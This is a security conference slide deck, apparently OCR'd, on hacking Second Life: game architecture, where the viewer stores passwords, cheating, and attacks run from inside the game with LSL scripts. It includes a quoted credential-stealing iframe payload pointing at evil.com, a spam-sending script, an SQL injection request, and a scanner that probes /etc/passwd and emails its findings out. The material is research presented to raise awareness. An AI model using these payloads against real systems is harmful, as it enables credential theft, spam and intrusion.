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#whoami 


ERNW 



Living Security. 


Head of Research & Chief Security Officer, ERNW GmbH 

Talks and Publications: 

■ “Hacking SecondLife”, Hack-in-the-Box, Dubai 2008 

■ “Reversing - A structured approach”, RSA Conference San Francisco 2008 

■ “Hacking SecondLife”, Blackhat Europe, Amsterdam 2008 

■ “Hacking the Cisco NAC Framework”, Sector, Toronto, November 2007 

■ “Hacking SecondLife”, Daycon, Dayton 2007 

■ “Hacking Cisco NAC”, Hack-in-the-Box, Kuala Lumpur, 2007 

■ “NAC@ACK”, Blackhat-USA, Las Vegas, 2007 

■ “NAC@ACK”, Blackhat-Europe, Amsterdam, 2007 

■ “More IT-Security through PenTests”, Book published by Vieweg 2005 

■ What I like to do 

■ Breaking things ;-) and all that hacking ninjitsu 

■ Diving (you would be surprised what kind of IT-Security lessons you can learn 
from diving) 

Contact Details: 

■ Email: mthumann@ernw.de / Web: http://www.ernw.de 
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■ Part 1 - Why to hack Online Games 

■ Part 2 - SecondLife™ Architecture 

■ Part 3 - Hacking the Game 

■ Part 4 - Attacks from the Virtual World 

■ Part 5 - Showtime 
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Part 1 - Why to hack Online Games 
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Why to hack Online Games 
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Living Security. 


■ Cheating is much more easier than spending long time to 
reach the next level, earning points, money or whatever 

■ Because watching tv or hacking yet another web server is 
boring 

■ It’s fun playing games and breaking them 

■ To show that we can do it 

■ Because there are marketplaces where you make real 
money out of it and I would like to be rich *justkidding* 

■ And to improve security, because the threats are real and 
exploiting online games gets more common 





Why SecondLife™ ? 
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■ Many people are playing SecondLife™ 

■ There’s a Scripting Language in SecondLife™ , do you 
know LSL (Linden Scripting Language) ? 

■ Because you can attack real world systems out of the 
virtual world 

■ Identity Theft looks sooo pretty easy in SecondLife™ 

■ Identity Theft gives you all their Linden Dollars 

■ Current change rate L$ 230 = US$ 1 © 





ERNW 



Living Security. 


Part 2 - SecondLife™ Architecture 
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SecondLife™ Components 
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Living Security. 


■ Login Server: Handles authentication, determines login 
region and finds corresponding Simulator 


■ User Server: Handles instant messaging sessions 


■ Data Server: Handles connections to the central database, 
log database, inventory database and search database 

■ Space Server: Handles routing of messages based on grid 
locations. Simulators register here and get information 
about their neighbors 





SecondLife™ Components 
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Living Security. 


■ Central Database: Inventory, Billing etc. 

■ Simulator: Each simulator process simulates one 256x256 
meter region of the virtual world 

■ Grid: The virtual world based on simulators 

■ Viewer: The Game Client 

■ Avatar: Your Second Life Character 
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Part 3 - Hacking the Game 
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Threat Analysis with STRIDE 


■ Spoofing Identity 

■ Tampering with Data 

■ Repudiation 

■ Information Disclosure 

■ Denial of Service 

■ Elevation of Privileges 
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Interesting Points of Attack 
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Data Server User Server Space Server 


Central Central Central Central 
DB Server DB Server DB Server DB Server 





Threat Analysis with STRIDE 
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1 . Spoofing Identity (Identity Theft) / Tampering with Data 
(Cheating) 

2. Spoofing Identity (Identity Theft) 

3. Repudiation (Billing) / Tampering with Data (increase your 

L$) 
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The Viewer 
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■ Let’s focus on the viewer, cause attacking Linden Lab’s 
Systems is illegal © 

■ Luckily the source is available (the viewer is Open 
Source), so we can find out how the stuff is working 

■ And we can modify everything we want and build our own 
client © 

■ So what can we do: Identity Theft and Cheating 
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The Viewer - Identity Theft 
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■ We need Username and Password 

■ You can find everything you want in “\Documents and 
Settings\<WinUser>\Application Data\SecondLife” 

■ There’s a directory named “firstname_lastname” of your 
SL account 

■ If the password is saved, you can find it in the 
subdirectory “user_settings” in the file “password.dat” 

■ ... and you need the MAC Address of the victim system 
too (you still remember commands like “ipconfig /all” and 
how to enter them at a commandline © ?) 





Password Encryption 
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Password Cracking 
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■ The Viewer uses standard MD5 

■ The MD5 Hash is xored with the MAC Address 

■ Time to build a SL password cracker? 

■ Or just use tools like md5crack or mdcrack © 
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Vulnerabilities in SecondLife™ 
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Living Security. 


News 

Report of 18.09.2007 16:16 [« previous] [next >>] 

Security hole in Second Life client 

Security blogger Petko Petkov has reported a vulnerability in the Second Life online gaming client Attackers can 
apparently exploit it to obtain user login credentials for the gaming site When installed, the client registers the URI 
secor.diife : //. This URI can then be used to transfer other parameters when the client is launched. When the 
following line is embedded in a website, attackers can get the client to send login credentials in an XML form without 
being prompted: 

<iframe sr c= ' secondlif e : //" —autologin 
— loginuri "http : / /evil . com/ sl/record— login . php ’ x/ifrane> 

An XML document transmitted by the Second Life client contains a login name and user password, both of which are 
sent as an MD5 hash. The credentials can be recovered by an attacker, for example by using Rainbow tables which 
are readily available online But Petkov points out that this process is usually unnecessary. The hash alone generally 
suffices to login at Second Life. He says that the password is only needed to use other Second Life services. Victims 
need only visit to a specially crafted website or open an HTML e-mail for the attack to succeed. There is no solution 
for this vulnerability; un-registering the URI should help, though, as a workaround, and gamers should of course 
ensure their Second Life login is completely different from their computer account credentials. 

It remains to be seen what real use criminals can make of this login data. Probably the most lucrative option would be 
to clean out a victim's virtual Linden dollar account Currently. 1,000 Linden dollars are worth 3.5 real-world US 
dollars. On the other hand, it will probably be difficult to withdraw large amounts because there is a cap on exchanges 
depending on how long a user has been playing At any rate, few players are said to have more than 250.000 Linden 
dollars, which only amounts to around UK£430. 





Cheating - Main Goals 
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■ Try to find out where the inventory is located and if you 
are able to modify it (change your amount of L$) 

■ Find any kind of magic key sequences built in like typing 
“wanttoberich” and get rich © or getting into 
“GodMode” (I am Avatar Allmighty) that is reserved for 
Linden employees 

■ Automate stupid and boring things while playing (not 
relevant at a first glance, but what about an Avatar that 
automatically builds objects in a sandbox area and then 
tries to sell them to other people?) 





Cheating - What to do 
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■ Reverse engineer the game client (but why, we have the 
source code ©) 

■ Look at different memory locations for interesting Data 

■ Sniff the network traffic 

■ Modify the Game Client to fit your needs (add some nice 
logging capabilities for example) 

■ Attack the game environment (illegal !!!) 





Cheating - Memory 
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Cheating - Sniffing 
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The Viewer - 1 st Conclusion 
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■ I don’t say that SL is secure!!! 

■ At least the developers spend some of their time to audit 
the source code automatically using the tool flawfinder 

■ The password, if saved, is encrypted with a “key” from 
the user system 

■ Important Data is stored in the Central Database and not 
on the viewer system, so it’s not subject to tampering 

■ Security Patching of the viewer is enforced by Linden 
Labs (that kicked my password stealing demo, sorry 
guys) 

■ I have seen worse things 





Security@LindenLabs 
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Living Security. 


■ The environment uses Apache and Squid on Debian 
Linux (sounds good, if you still believe that Linux is 
secure) 

■ Reverse proxy concepts are used 

■ Login is done via HTTPS 
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Environment 
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https://66.1 50.244.1 78/favicon. ico 

GET /favicon. ico HTTP/1.0 
Host: 66.150.244.178 
■ ■ ■ 

Connection: keep-alive 

HTTP/1 .x 404 Not Found 

Date: Sat, 13 Oct 2007 03:28:32 GMT 

Server: Apache/2.0.54 (Debian GNU/Linux) mod_auth_kerb/5.0-rc6 DAV/2 SVN / 
1.4.2 modjk2/2.0.4 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_perl/1 .999.21 Perl/v5.8.4 

■ ■ ■ 

X-Cache: MISS from login7.agni.lindenlab.com 
X-Cache-Lookup: MISS from Iogin7.agni.lindenlab.com:80 
Via: 1.0 Iogin7.agni.lindenlab.com:80 (squid/2. 6.STABLE1 2) 





Does this server look secure? 
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Securityfocus 
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Vulnerabilities 


(Page 1 oFi} 



Vendor: LINDEN RESEARCH, INC. 


Title: 

Second Lite Viewer 

T1 

Version: 

Select Version £ 



Search by CVE 
CVE: 

" Submit 


Apple QuickTime IRTSP Response Header Content-Type Remote Stack Based 
Buffer Overflow Vulnerability 

2008-03-04 

http ://w w w . secu rityFocu s. com/bi d/2 6 54 9 






Security@LindenLabs - 2 nd ERNW 

^ , . ~p Living Security. 

Conclusion — <*— 

■ Communication is secured with SSL 

■ The server installation looks like a default installation 

■ From my point of view the servers are not hardened in 
any way 

■ I couldn’t dig deeper because my “Get out of jail” card 
was missing © 
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Part 4 - Attacks from the Virtual World 
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SecondLife™ Virtual Attacks 


ERNW 



Living Security. 


■ LSL (Linden Scripting Language) is at hand © 

■ And there are lots of interesting functions from an 
attackers point of view 

■ What about sending spam? 

■ What about attacking real www servers from the virtual 
world? 

■ What about complex hacker tools developed in LSL? 





LSL Functions 
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Living Security. 


■ IIEmail(recipient, subject, message) 

■ IIHTTPRequest(url, parameter, body) 

■ IILoadURL(avatar_id, message, url) 

■ And there are even XML-RPC Functions that can 
communicate with the outside world 



Hacking SecondLife™ by Michael Thumann 


4 / 21/08 


32 
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Sending Spam p Living security. 

■ Create text file with email addresses on a web server that 
you own © 

■ Download file with LSL IIHTTPRequest within SL and 
parse the reponse 

■ Send Spam to each email address 
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Sending Spam -Example Script 
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default 

{ 

state_entry() 

{ 

http_requestJd=MHTTRRequest(URL+ , Vsldemo.txt", [HTTPMETHOD, ,, GET ,, ], ,,M ); 

} 

touch_start(integer total_number) 

{ 

for(; i<IIGetListLength(my_list)+1; ++i){ 

IIEmail(IIList2String(my list,i),"SL Spam", "Mine is longer than yours 

} 

} 

http_response(key requestjd, integer status, list metadata, string body) 

{ 

if ( requestjd == http_requestjd ) 

{ 

myjist = IIParseString2List(body, [";"],[]); 

} 

} 

} 











Attacking real www server 
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■ Ok, we can send HTTP Requests © 

■ So there’s SQL Injection 

■ ... and Cross Site Scripting 

■ ... and Web Defacement with HTTP PUT 

■ You can do almost everything 
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SQL Injection in Query String 


default 
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{ 

state_entry() 

{ 

http_request_id=IIHTTPRequest(URL+'7sldemo.aspx? 
user=sldemo';DROP Table;-", [HTTP_METHOD, ,, GET ,, ], ,M '); 

} 

touch_start(integer total_number) 

{ 

IISay(0, "You're owned!"); 

} 

http_response(key request_id, integer status, list metadata, string body) 

{ 

} 

} 










Hacker Tools 
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■ You can build complex hacker tools with LSL 

■ Think of a web scanner like nikto build with LSL, emailing 
all the findings to an anomyous email account 

■ Let’s call it slikto © 



Hacking SecondLife™ by Michael Thumann 


4 / 21/08 


39 




Slikto 0.1 Beta © 


list scanlist =[ , 7index.htmr, "/sl.html", "/login. html", "/etc/passwd", "/etc/sshd.conf", "/var/log/syslog"]; 
list respjd =[]; 

state_entry() 

{ 

for (;i<max;i++) 

{ 

http_requestJd=IIHTTPRequest(URL+IIList2String(scanlist,i), [HTTPMETHOD, "GET"], "test"); 
respjd +=[http_requestjd]; 

} 

} 

http_response(key requestjd, integer status, list metadata, string body) 

{ 

for (;j<max;j++) 

{ 

if ( requestjd == IIList2Key(respJd,j) ) 

{ 

if (status==200) 

{ 

IIEmail("mlthumann@ids-guide.de","FOUND!",IIList2String(scanlist,j)); 
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Slikto 0.1 Beta © 


■ I know, Slikto needs some improvements, but hey guys, 
it’s beta software 

■ Use IIHTTPRequest to download a database from a web 
server containing all tests 

■ Or even better: Download one check, so we’re prepared for 
a distributed scanner 

■ Implement more reliant checks of the results (think of 
customized error pages) like parsing the body of the 
response 

■ Ok, here’s version 0.2 beta © 


ERNW 
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L$0 


A ^ O Second Life 


File Edit view World Tools Help O Italian Life 62, 223, 2 1 (Mature) - Italia 


1:10 PM PDT 


Search 







SecondLife™ Virtual Attacks 

■ And there’s even more 

■ Phishing attacks 

■ Changing the appearance of 
your avatar (on my 1st visit in 
SecondLife™ I touched 
everything *bg* and looked like a 
monster afterwards) 
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Realistic Attacks? 


■ Every Object and Script has an owner and a creater that 
can be tracked 

■ Avatars are for free and do you think these people are 
using their real names? I don’t © ! 

■ There are Sandbox Areas where you can build objects, 
develop scripts and find other people that are curious and 
touch everything, but Sandboxes are cleaned after 5 hours 
(and I was banned from my favorite Sandbox after the last 
demo ©) 

■ Do you remember the automated Avatar, selling objects 
with scripts attached © ? 

■ In Real life we call that bots 
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Realistic Attacks? 


■ Other security researchers are also working on SL hacks 

■ Charles Miller was presenting about the mentioned 
Quicktime vulnerability last month using Shellcode to 
control the SL Viewer and stealing money from every 
avatar within a range of about 200 feet of an malicious 
object 


ERNW 

Living Security. 
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Some more ideas about attacks 
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■ Build more tools like Port Scanners and Fuzzers 

■ What about spying after identity theft of a managers 
business avatar? 

■ Or using our LSL Hacker tools to attack the Linden Lab 
infrastructure (remember that the mentioned attacks were 
originated from their systems)? I don’t think that a firewall 
is protecting their systems from each other. I hope that I’m 
wrong! 





Final Conclusion 
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■ Exploiting Online Games gets more common and SL is 
just an example 

■ There’s a really big WoW Community and also Online 
Gambling like Poker gets more and more attention 

■ Online Games are about making money, so that’s a 
growing marketplace and where money is made, you also 
find cheaters, criminals and hackers 

■ Especially Virtual Worlds offer a lot of serious attack 
vectors 

■ Hacking Games is NOT just fun, I think it will also become 
a new field of customers for Security Professionals, so 
take this talk a little bit more serious 





Further readings 



EXPLOITING 

ONLINE GAMES 
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Thanks to Greg for some 
inspiration and for signing 
my personal copy © 
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Thank’s for your patience 


Time left for 'questions & answers' ? 

You can always drop me a note at: 
mthumann@ernw.de 





